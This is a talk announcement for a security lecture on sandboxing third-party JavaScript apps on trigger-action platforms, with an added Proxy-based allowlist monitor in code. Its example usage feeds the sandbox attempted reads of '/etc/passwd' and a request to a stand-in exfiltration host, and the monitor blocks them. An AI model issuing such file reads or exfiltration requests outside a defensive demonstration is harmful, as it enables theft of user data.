Virtual Talk: SandTrap: Securing JavaScript-driven Trigger-Action Platforms

Andrei Sabelfeld: Professor, Department of Computer Science and Engineering at Chalmers University of Technology in Gothenburg, Sweden

Friday, November 13, 2020
4-5 p.m.

Abstract: Trigger-Action Platforms (TAPs) play a vital role in fulfilling the promise of the Internet of Things (IoT) by seamlessly connecting otherwise unconnected devices and services. While enabling novel and exciting applications across a variety of services, TAPs raise critical security and privacy concerns because a TAP is effectively a person-in-the-middle between trigger and action services. Third-party code, routinely deployed as "apps" on TAPs, further exacerbates these concerns.

This talk focuses on JavaScript-driven TAPs. We show that the popular IFTTT and Zapier platforms and an open-source alternative, Node-RED, are all susceptible to attacks, ranging from massively exfiltrating data from unsuspecting users to taking over the entire platform. We report on the changes made by IFTTT and Zapier in response to our findings and present an empirical study to assess the implications for Node-RED.

Motivated by the need for a secure yet flexible way to integrate third-party JavaScript apps, we propose SandTrap, a sandboxing approach that isolates apps while letting them communicate via clearly defined interfaces. We present a formalization for a core language that soundly and transparently enforces fine-grained allowlist policies at module-, API-, value-, and context-level. We develop a novel proxy-based JavaScript monitor that enables us to instantiate SandTrap for Node-RED and that includes a powerful policy generation mechanism. We evaluate the security and performance of the implementation on Node-RED apps.
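The proxy-based allowlist monitor described in the abstract, as an added illustration of the idea and not SandTrap's own code: a JavaScript Proxy sits between an untrusted app and the modules it requires, and denies by default at module level (which modules may be required), API level (which properties of a module may be read or called) and value level (a predicate over the actual call arguments). The sample modules, the policy object format and the helper names (`makeMonitor`, `runApp`, `PolicyViolation`, `own`) are assumptions made for this example; context-level policy is approximated by giving each app its own monitor instance with its own policy. The example also handles one edge case such monitors must get right: inherited keys like `constructor` or `__proto__` must not count as allowlisted.

```javascript
// Added illustration (not SandTrap's code) of a proxy-based allowlist monitor.
// The modules, policy format and helper names below are assumptions made
// for this example.

// Constructed stand-ins for modules an app might require() on a TAP.
const sampleModules = {
  http: {
    get(url) { return `GET ${url}`; },
    post(url, body) { return `POST ${url} ${JSON.stringify(body)}`; },
  },
  fs: {
    readFileSync(path) { return `contents of ${path}`; },
  },
};

// Policy (assumed format): allowlist of modules; per module, allowlist of
// APIs; per API, an optional value-level predicate over the call arguments.
// Anything not listed is denied.
const samplePolicy = {
  http: {
    get: {
      args: ([url]) =>
        typeof url === 'string' && url.startsWith('https://api.example.com/'),
    },
  },
  // 'fs' is absent: denied at module level.
};

class PolicyViolation extends Error {}

// Own-property lookup so inherited keys such as 'constructor' or '__proto__'
// never count as allowlisted (a plain obj[key] would return Object's
// constructor for key 'constructor').
function own(obj, key) {
  return Object.prototype.hasOwnProperty.call(obj, key) ? obj[key] : undefined;
}

// Build a sandboxed require() for one app. Calling makeMonitor once per app
// with that app's own policy is how this example approximates context-level
// policy: the same module name can map to different allowlists per app.
function makeMonitor(modules, policy) {
  function wrapApi(modName, apiName, fn, target, apiPolicy) {
    return new Proxy(fn, {
      apply(realFn, _thisArg, args) {
        // Value-level check: the predicate sees the actual arguments.
        if (apiPolicy.args && !apiPolicy.args(args)) {
          throw new PolicyViolation(`call to ${modName}.${apiName} rejected by value policy`);
        }
        // Invoke the real function with the unwrapped module as `this`.
        return Reflect.apply(realFn, target, args);
      },
    });
  }

  function wrapModule(modName, mod, modPolicy) {
    return new Proxy(mod, {
      get(target, prop, receiver) {
        // API-level check: any property not in the allowlist is denied,
        // including Symbol-keyed and inherited properties.
        const apiPolicy = own(modPolicy, prop);
        if (apiPolicy === undefined) {
          throw new PolicyViolation(`api ${modName}.${String(prop)} not in allowlist`);
        }
        const value = Reflect.get(target, prop, receiver);
        return typeof value === 'function'
          ? wrapApi(modName, String(prop), value, target, apiPolicy)
          : value;
      },
      // Apps may not mutate shared module objects through the proxy.
      set(_target, prop) {
        throw new PolicyViolation(`write to ${modName}.${String(prop)} not permitted`);
      },
      defineProperty(_target, prop) {
        throw new PolicyViolation(`defineProperty on ${modName}.${String(prop)} not permitted`);
      },
    });
  }

  return function sandboxedRequire(modName) {
    // Module-level check.
    const modPolicy = own(policy, modName);
    if (modPolicy === undefined) {
      throw new PolicyViolation(`module ${modName} not in allowlist`);
    }
    if (!Object.prototype.hasOwnProperty.call(modules, modName)) {
      throw new Error(`unknown module ${modName}`);
    }
    return wrapModule(modName, modules[modName], modPolicy);
  };
}

// Run an untrusted app function under a fresh monitor and report the outcome.
function runApp(app, policy = samplePolicy, modules = sampleModules) {
  const sandboxedRequire = makeMonitor(modules, policy);
  try {
    return { ok: true, value: app(sandboxedRequire) };
  } catch (err) {
    if (err instanceof PolicyViolation) return { ok: false, reason: err.message };
    throw err;
  }
}

// Example usage: one benign call followed by module-, API- and value-level denials.
console.log(runApp((req) => req('http').get('https://api.example.com/v1/items')));
console.log(runApp((req) => req('fs').readFileSync('/etc/passwd')));
console.log(runApp((req) => req('http').post('https://api.example.com/v1/items', {})));
console.log(runApp((req) => req('http').get('https://attacker.example/exfil')));
```

The monitor is deliberately deny-by-default: an app that touches a property the policy does not name, even `constructor` or a well-known Symbol, gets a `PolicyViolation` rather than a reference to the underlying object, which is what keeps the unwrapped module from escaping the sandbox.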

Bio: Andrei Sabelfeld is a Professor in the Department of Computer Science and Engineering at Chalmers University of Technology in Gothenburg, Sweden. Before joining Chalmers as faculty, he was a Research Associate at Cornell University in Ithaca, NY, USA. His research spans foundations and practice across a range of topics in computer security and privacy. Today, he leads a group of researchers at Chalmers engaged in a number of internationally visible projects on software security, web security, IoT security, and applied cryptography.


